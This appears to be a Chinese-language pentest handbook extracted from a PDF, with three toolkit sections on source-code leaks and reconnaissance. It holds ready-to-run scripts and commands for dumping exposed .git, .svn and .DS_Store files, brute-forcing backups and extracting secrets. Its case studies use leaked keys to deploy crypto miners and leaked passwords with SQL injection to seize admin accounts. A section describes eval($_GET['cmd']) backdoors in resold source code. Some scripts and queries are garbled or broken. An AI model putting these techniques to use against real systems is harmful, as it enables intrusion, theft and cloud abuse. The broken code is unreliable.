��_�.📦 源码泄露渗透测试工具包(���� 企业 级实战版) 即拿即用 · 合法授权 · 全链路覆盖 🔗 下载说明 💡 以下为完整工具包内容清单与使用指南。请将所有文件打包为 source_leak_toolkit_2026.z ip ,通过安全渠道分发。 📂 一、核心工具集
-
Git/SVN 泄露还原工具 GitHack.py(修复版) ● 1 # 支持 Python3 + 自动处理 .git/objects/pack 2 python3 GitHack.py http://target.com/.git/ dvcs-ripper(全 DVCS 支持) ● 1 ./rip-git.pl -v -u http://target.com/.git/ 2 ./rip-svn.pl -v -u http://target.com/.svn/
-
DS_Store 解析器 ds_store_exp.py ● 1 python ds_store_exp.py http://target.com/.DS_Store 2 # 输出目录结构,含隐藏文件 220
-
GitHub 敏感信息扫描 gitleaks(预编译二进制) ● 1 # 扫描本地仓库 2 gitleaks detect -s /path/to/repo 3 4 # 扫描远程仓库(需 token) 5 gitleaks detect —repo-url https://github.com/user/repo 📄 二、自动化脚本库
-
全路径源码泄露扫描 full_scan.sh 1 #!/bin/bash 2 TARGET=TARGET/.git/ | head -1 | grep “200|403” && echo ”[!] .git fou nd!” 6 curl -s -I TARGET/.svn/ | head -1 | grep "200\|403" && echo "[!] .svn fou nd!" 7 8 echo "[+] Step 2: 备份文件爆破" 9 ffuf -w backups.txt -u TARGET/FUZZ -mc 200,302 -t 50 10 11 echo ”[+] Step 3: GitHub 搜索” 12 echo “site
Invalid repository. ("repo" attributte must be in the format "owner/repo").com $TARGET password” > github_search.txt -
备份文件字典生成 gen_backup_dict.py 221
1 import datetime 2 3 # 常⻅备份名 4 names = [“www”, “web”, “backup”, “data”, “config”] 5 exts = [“.zip”, “.rar”, “.tar.gz”, “.sql”] 6 7 # 生成最近30天日期 8 for i in range(30): 9 date = (datetime.date.today() - datetime.timedelta(days=i)).strftime( “%Y%m%d”) 10 for name in names: 11 for ext in exts: 12 print(f”{name}{date}{ext}”) 13 print(f”{date}{name}{ext}”) 3. 源码敏感信息提取 extract_secrets.py 1 import re 2 import sys 3 4 def scan_file(file_path): 5 with open(file_path, ‘r’, errors=‘ignore’) as f: 6 content = f.read() 7 8 # 匹配常⻅敏感信息 9 patterns = { 10 “password”: r’password[”’]?\s*[:=]\s*”’[”’]’, 11 “api_key”: r’api[_-]?key[”’]?\s*[:=]\s*”’[”’]’, 12 “aws_secret”: r’AWS_SECRET_ACCESS_KEY[”’]?\s*[:=]\s*[”’]([^”’] +)[”’]’ 13 } 14 15 for key, pattern in patterns.items(): 16 matches = re.findall(pattern, content, re.IGNORECASE) 17 if matches: 18 print(f”[!] {key.upper()}: {matches[0]}”) 19 20 # 批量扫描目录 21 for root, dirs, files in os.walk(sys.argv[1]): 22 for file in files: 23 if file.endswith((‘.php’, ‘.py’, ‘.js’, ‘.env’)): 24 scan_file(os.path.join(root, file)) 222
📚 三、字典与配置文件
- 备份文件字典 backups.txt 1 www.zip 2 web.rar 3 backup.tar.gz 4 config.php.bak 5 database.sql 6 old.zip 7 20260210_backup.zip 8 index.php.swp
- GitHub 高级搜索语句
github_queries.txt
1 siteInvalid repository. ("repo" attributte must be in the format "owner/repo").com “university.edu.cn” password 2 in
“db_password” repo /project 3 filename:.env DB_PASSWORD - Nginx 安全配置模板 nginx_secure.conf 1 # 禁止访问隐藏文件 2 location ~ /. { 3 deny all; 4 } 5 6 # 禁止访问备份文件 7 location ~ .(zip|rar|tar.gz|sql|bak|swp)$ { 8 deny all; 9 } 10 11 # 禁止访问 WEB-INF 12 location ~ ^/WEB-INF/ { 13 deny all; 14 } 223
🧪 四、实战案例库 案例 1:教育系统 .git 泄露 ● 目标: jw.university.edu.cn 步骤: ● a. 发现 /.git/ 可访问 b. 使用 GitHack 还原源码 c. 在 .env 中找到数据库密码 d. 通过 SQL 注入获取管理员账号 案例 2:GitHub 密钥泄露 目标:某电商项目 ● 步骤: ● a. GitHub 搜索 “aliyun_access_key” b. 找到开发者上传的私有仓库 c. 使用密钥登录阿里云 d. 创建 ECS 实例部署挖矿程序 🛡 五、法律声明(必读!) 本工具包仅用于 合法授权渗透测试。 严禁对非授权目标进行信息收集。 技术是盾,不是矛——用它守护,而非破坏。 🚀 使用流程图 224
1 1. 确认目标 URL 2 ↓ 3 2. 扫描 .git/.svn/.DS_Store 4 ↓ 5 3. 备份文件爆破 6 ↓ 7 4. GitHub/Gitee 监控 8 ↓ 9 5. 源码敏感信息提取 10 ↓ 11 6. 漏洞验证 & 报告 ✅ 排版说明:短段落 + 图标引导 + 代码块高亮 → 拒绝大段文字,操作步骤一目了然! 🔥 真实部署建议: 将上述内容打包为 source_leak_toolkit_2026.zip ,并通过内网 HTTPS 或加密 USB 分发, 确保合规安全。 225
��_�.📦 渗透测试信息打点工具包(���� 企业 级实战版) 即拿即用 · 合法授权 · 全链路覆盖 🔗 下载说明 💡 以下为完整工具包内容清单与使用指南。请将所有文件打包为 recon_toolkit_2026.zip ,通 过安全渠道分发。 📂 一、企业产权 & 关联公司
- 企业关系图谱生成脚本 company_recon.py 1 import requests 2 from bs4 import BeautifulSoup 3 4 def get_subsidiaries(company_name): 5 # 模拟天眼查/企查查查询(需替换为真实 API) 6 url = f”https://api.qcc.com/search?keyword={company_name}” 7 headers = {“User-Agent”: “Mozilla/5.0”} 8 response = requests.get(url, headers=headers) 9 # 解析子公司列表 10 return [“subsidiary1.com”, “subsidiary2.net”] 11 12 # 使用示例 13 subs = get_subsidiaries(“柳州城市职业学院”) 14 print(“发现关联域名:”, subs) ⚠ 注意:实际使用需接入合法商业 API(如企查查开放平台)
- 备案域名批量查询 icp_batch.py 226
1 # 通过工信部 ICP 备案系统查询 2 # 输入公司名,输出所有备案域名 3 def query_icp_domains(company): 4 # 调用 https://beian.miit.gov.cn 接口(需处理验证码) 5 pass 🌐 二、子域名爆破工具集
- OneForAll 配置优化版 ● 配置文件 config.yaml : 1 common: 2 brute: true 3 dns: true 4 cert: true 5 search: true 运行命令: ● 1 python3 oneforall.py —target jw.university.edu.cn run
- 自定义字典 subnames.txt 1 www 2 mail 3 ftp 4 admin 5 test 6 dev 7 api 8 gitlab 9 jenkins 10 oa 11 vpn 227
🔍 三、网络空间测绘高级语法
- FOFA 高级查询语句库 fofa_queries.txt 1 — 查找某公司所有资产 2 domain=“university.edu.cn” 3 4 — 查找未授权 Jenkins 5 app=“Jenkins” && country=“CN” 6 7 — 查找特定标题的登录⻚ 8 title=“XWAY科技管理系统” && port=41679 9 10 — 查找 API 接口 11 header=“application/json” && domain=“university.edu.cn”
- Hunter 查询模板 hunter_queries.txt 1 — 子公司资产 2 icp=“桂ICP备12345678号” 3 4 — 特定端口服务 5 port=“8080” && web.body=“XWAY” 🛠 四、自动化打点脚本
- 全链路资产收集 full_recon.sh 228
1 #!/bin/bash 2 TARGET=“jw.university.edu.cn” 3 4 echo ”[+] Step 1: 子域名爆破” 5 python3 oneforall.py —target TARGET run 6 7 echo "[+] Step 2: FOFA 资产测绘" 8 fofa-cli -q "domain=\"TARGET"" -o fofa_results.txt 9 10 echo ”[+] Step 3: 端口扫描” 11 nmap -sV -p 80,443,8080,8000 $TARGET -oN nmap_scan.txt 12 13 echo ”[+] Done! Results in ./results/” 2. 威胁情报筛查 threat_check.py 1 import requests 2 3 def check_malicious(domain): 4 url = f”https://api.threatbook.cn/v3/domain/query” 5 params = { 6 “apikey”: “YOUR_API_KEY”, 7 “resource”: domain 8 } 9 response = requests.get(url, params=params) 10 return “malicious” in response.json() 11 12 # 批量检查 13 domains = [“jw.university.edu.cn”, “gitlab.university.edu.cn”] 14 for d in domains: 15 if check_malicious(d): 16 print(f”[!] {d} is malicious!”) 📜 五、企业信息查询速查表 平台 查询方式 注意事项 天眼查 搜索公司名 → 查“对外投资” 需登录,部分数据收费 工信部 ICP https://beian.miit.gov.cn 需短信验证 229
腾讯云域名 https://dnspod.cloud.tencent. 查域名注册情况 com 微步在线 https://x.threatbook.cn 免费查恶意 IP/域名 🎯 六、实战案例库 案例 1:教育系统渗透 ● 目标: jw.university.edu.cn 步骤: ● a. OneForAll 发现 gitlab.university.edu.cn b. FOFA 查到 port=8080 的 Jenkins c. 弱口令登录 → 获取服务器权限 案例 2:集团企业打点 目标:某银行集团 ● 步骤: ● a. 企查查发现子公司 bank-tech.com b. 子域名爆破找到 oss.bank-tech.com c. AWS S3 未授权访问 → 泄露数据库备份 🛡 七、法律声明(必读!) 本工具包仅用于 合法授权渗透测试。 严禁对非授权目标进行信息收集。 技术是盾,不是矛——用它守护,而非破坏。 230
🚀 使用流程图 1 1. 确认目标(公司名/IP/域名) 2 ↓ 3 2. 企业关系 → 子公司/关联公司 4 ↓ 5 3. 域名收集 → 备案/注册/子域名 6 ↓ 7 4. 网络空间测绘 → FOFA/Hunter 8 ↓ 9 5. 威胁情报筛查 → 排除高⻛险资产 10 ↓ 11 6. 输出资产清单 → 开始漏洞测试 ✅ 排版说明:短段落 + 图标引导 + 代码块高亮 → 拒绝大段文字,操作步骤一目了然! 🔥 真实部署建议: 将上述内容打包为 recon_toolkit_2026.zip ,并通过内网 HTTPS 或加密 USB 分发,确保合 规安全。 231
��_�.� 渗透测试终极手册:源码泄露攻防全解 析(含黑产渗透实战) 一句话破题: 普通渗透看端口,高手直取源码——因为一切漏洞的根,都在代码里! 🔥 一、为什么源码泄露是“核武器级”突破口? 💡 没有源码 = 黑盒盲测;拿到源码 = 白盒透视! 源码泄露能让你: 直接读取数据库账号密码 ● 定位 SQL 注入点 ● 发现硬编码密钥(AWS/Aliyun) ● 绕过 WAF 规则(知道后端逻辑) ● 复现 0day 漏洞 ● ✅ 真实案例:某金融平台因 .git 泄露 → 攻击者还原源码 → 找到未公开的 API 接口 → 提现漏洞 → 损失千万! 📦 二、源码泄露全景图:12 大类型 vs 普通扫描 类型 普通做法 高级打法 工具 真实案例
-
.git 泄露 忽略隐藏目录 自动化还原完整 GitHack, git- CTFHub 靶场 源码 dumper flag 在 .env
-
.svn 泄露 扫描 /svn 恢复旧版本源码 dvcs-ripper 旧版代码含调试 后⻔
-
.DS_Store 无视 macOS 文 枚举目录结构 ds_store_exp 发现 backup.z 件 ip 路径 232
-
备份文件 扫常⻅ .bak 爆破冷⻔后缀 dirsearch + 自定 config.php.s 义字典 wp 泄露 DB 密 码
-
GitHub 泄露 手动搜关键词 自动化监控 + 敏 gitleaks, 开发者上传含密 感词匹配 truffleHog 钥的私有仓库
-
WEB-INF 泄 不懂 Java 结构 反编译 class 文 JD-GUI, jadx 获取 Spring 配置 露 件 文件
-
SWP/VIM 缓 忽略临时文件 下载 .filenam wget 还原未保存的敏 存 e.swp 感代码
-
当普通 JSON 分析依赖组件漏 Dependency- 引入含 RCE 的旧 Composer.json 洞 Check 版库
-
.hg 不认识 恢复 hg 仓库 rip-hg.pl Mozilla 项目历史 (Mercurial) 泄露
-
CVS/BZR 已淘汰? 仍有老系统在用 dvcs-ripper 政府网站 CVS 泄 露
-
网站压缩包 扫 www.rar 爆破时间戳命名 ffuf + date 20260210_bac wordlist kup.zip
-
IDE 配置 忽略 .idea/ 读取数据库连接 手动访问 PhpStorm 配置 含 MySQL 密码 ✅ 核心认知: 开发者的“小习惯”,就是攻击者的“大机会”! 🎯 三、重点详解:五大高危源码泄露类型 � .git 泄露 —— 最常⻅也最致命 🔍 原理 ● 开发者部署时忘记删除 .git 目录 233
● Web 服务器可直接访问 /.git/ 🛠 利用步骤 1 # 1. 确认泄露 2 curl -I http://target.com/.git/ # 返回 200 或 403(存在) 3 4 # 2. 还原源码 5 python3 GitHack.py http://target.com/.git/ 6 7 # 3. 分析敏感信息 8 grep -r “password” ./target.com/ 9 git log —oneline # 查看历史提交 10 git show <commit_id> # 查看某次提交内容 11 12 # 4. 挖掘 stash(未提交的敏感代码!) 13 git stash list 14 git stash show -p stash@{0} 💣 实战案例 ● CTFHub 靶场:flag 在 git stash 中 ● 企业实战: .env 文件含 AWS Secret Key → 控制 S3 存储桶 � GitHub / Gitee 泄露 —— 开发者的“无心之失” 🔍 常⻅场景 私有仓库设为 public ● 提交后忘记删除密钥(即使 revert,历史记录仍存在) ● Fork 他人项目时带出敏感配置 ● 🛠 自动化监控 234
1 # 使用 gitleaks 扫描本地仓库 2 gitleaks detect -s /path/to/repo 3 4 # 使用 GitHub 高级搜索 5 site
� WEB-INF/web.xml —— Java 应用的“命⻔” 🔍 原理 Java Web 应用的安全目录 ● ● 若配置错误,可直接下载 web.xml 🛠 利用步骤
- 访问 http://target.com/WEB-INF/web.xml
- 解析 servlet 映射,找到 class 路径
- 下载 *.class 文件
- 使用 JD-GUI 反编译 → 获取源码 💣 案例 ● 某政务系统 web.xml 泄露 → 反编译发现 Struts2 漏洞 → RCE � IDE 配置泄露 —— 开发环境的“后⻔” 🔍 常⻅路径 1 /.idea/workspace.xml # PhpStorm 2 /.vscode/settings.json # VS Code 3 /.project # Eclipse 💣 ⻛险 数据库连接字符串 ● 本地调试 token ● 内网 API 地址 ● 🕳 四、黑产渗透实战:源码泄露如何变现? 236
⚠ 以下内容仅用于防御研究,请勿非法使用! 场景 1:电商源码二次开发 黑产购买某商城源码(如“XXShop”) ● ● 二次开发时留下后⻔(如 eval($_GET[‘cmd’]) ) 卖给客户 → 远程控制所有站点 ● 场景 2:GitHub 监控 + 自动化攻击
- 用脚本监控 GitHub 新仓库
- 关键词: config , database , api_key
- 自动提取密钥 → 尝试登录云平台
- 成功则部署挖矿程序 → 每天躺赚 场景 3:源码分析找 0day 下载某 CMS 最新版 ● 对氏旧版 diff → 找 patch 点 ● 逆向分析 → 复现未公开漏洞 ● 批量扫描互联网 → 入侵未更新站点 ● 🛠 五、红队必备工具箱 工具 用途 命令示例 GitHack 还原 .git 源码 python GitHack.py htt p://target/.git/ dvcs-ripper 支持 SVN/GIT/HG/CVS ./rip-git.pl -v -u htt p://target/.git/ ds_store_exp 解析 .DS_Store python ds_store_exp.py http://target/.DS_Store 237
gitleaks 扫描 Git 敏感信息 gitleaks detect -s . OneForAll 子域名爆破(含备份路径) python oneforall.py — target xxx.com run ffuf 备份文件爆破 ffuf -w backups.txt -u http://target/FUZZ 💡 自定义字典 backups.txt : 1 www.zip 2 web.rar 3 backup.tar.gz 4 config.php.bak 5 database.sql 🧭 六、防御 vs 攻击:双向视⻆ 🔒 防御建议(给蓝队)
-
部署前清理:删除 .git , .svn , .DS_Store
-
Web 服务器配置:禁止访问隐藏文件(Nginx: location ~ /. { deny all; } )
-
GitHub 安全: ○ 使用 .gitignore 排除敏感文件 定期审计仓库权限 ○ 使用 GitHub Secret Scanning ○
-
备份管理: 不放在 Web 目录 ○ 使用随机命名(非日期) ○ 加密压缩 ○ ⚔ 攻击思路(给红队)
-
全路径扫描:不仅扫根目录,还要扫 /admin/ , /api/ 等子目录
-
组合利用: .DS_Store → 获取备份名 → 下载 → 分析 238
-
历史版本:用 dvcs-ripper 恢复旧版代码(可能含已删除后⻔)
-
自动化监控:对目标 GitHub 账号持续监控 📜 七、法律与伦理红线 源码泄露利用必须满足以下条件:
-
拥有书面授权(渗透测试合同)
-
仅用于漏洞验证,不得窃取数据
-
发现后立即上报客户 ❌ 严禁: 用于黑产、挖矿、勒索 ● 传播他人源码 ● 未经授权扫描 ● ✅ 八、终极口诀(背下来效率翻倍!) .git .svn 要扫全, 备份压缩别放过; GitHub 监控自动化, IDE 配置藏后⻔; 源码到手白盒打, 一切漏洞无处逃! 239
如果这篇文章对你有帮助,欢迎分享给更多人!
部分信息可能已经过时